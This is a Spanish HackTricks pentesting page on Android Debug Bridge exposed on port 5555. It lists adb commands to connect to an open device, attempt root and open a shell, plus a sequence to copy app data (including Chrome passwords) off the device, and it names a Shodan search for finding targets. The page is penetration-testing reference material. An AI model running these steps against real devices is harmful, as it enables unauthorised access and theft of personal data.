hacktricks/network-services-pentesting/5555-android-debug-bridge.md

4 KiB

5555 - Android Debug Bridge

{% hint style="success" %} Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks
{% endhint %}

Información Básica

De la documentación:

Android Debug Bridge (adb) es una herramienta de línea de comandos versátil que te permite comunicarte con un dispositivo. El comando adb facilita una variedad de acciones en el dispositivo, como instalar y depurar aplicaciones, y proporciona acceso a un shell de Unix que puedes usar para ejecutar una variedad de comandos en un dispositivo.

Puerto por defecto: 5555.

PORT     STATE SERVICE VERSION
5555/tcp open  adb     Android Debug Bridge device (name: msm8909; model: N3; device: msm8909)

Connect

Si encuentras el servicio ADB ejecutándose en un puerto de un dispositivo y puedes conectarte a él, puedes obtener un shell dentro del sistema:

adb connect 10.10.10.10
adb root # Try to escalate to root
adb shell

Para más comandos ADB, consulta la siguiente página:

{% content-ref url="../mobile-pentesting/android-app-pentesting/adb-commands.md" %} adb-commands.md {% endcontent-ref %}

Volcar datos de la aplicación

Para descargar completamente los datos de una aplicación, puedes:

# From a root console
chmod 777 /data/data/com.package
cp -r /data/data/com.package /sdcard Note: Using ADB attacker cannot obtain data directly by using command " adb pull /data/data/com.package". He is compulsorily required to move data to Internal storage and then he can pull that data.
adb pull "/sdcard/com.package"

Puedes usar este truco para recuperar información sensible como contraseñas de chrome. Para más información sobre esto, consulta la información y referencias proporcionadas aquí.

Shodan

  • android debug bridge

{% hint style="success" %} Aprende y practica Hacking en AWS:HackTricks Training AWS Red Team Expert (ARTE)
Aprende y practica Hacking en GCP: HackTricks Training GCP Red Team Expert (GRTE)

Apoya a HackTricks
{% endhint %}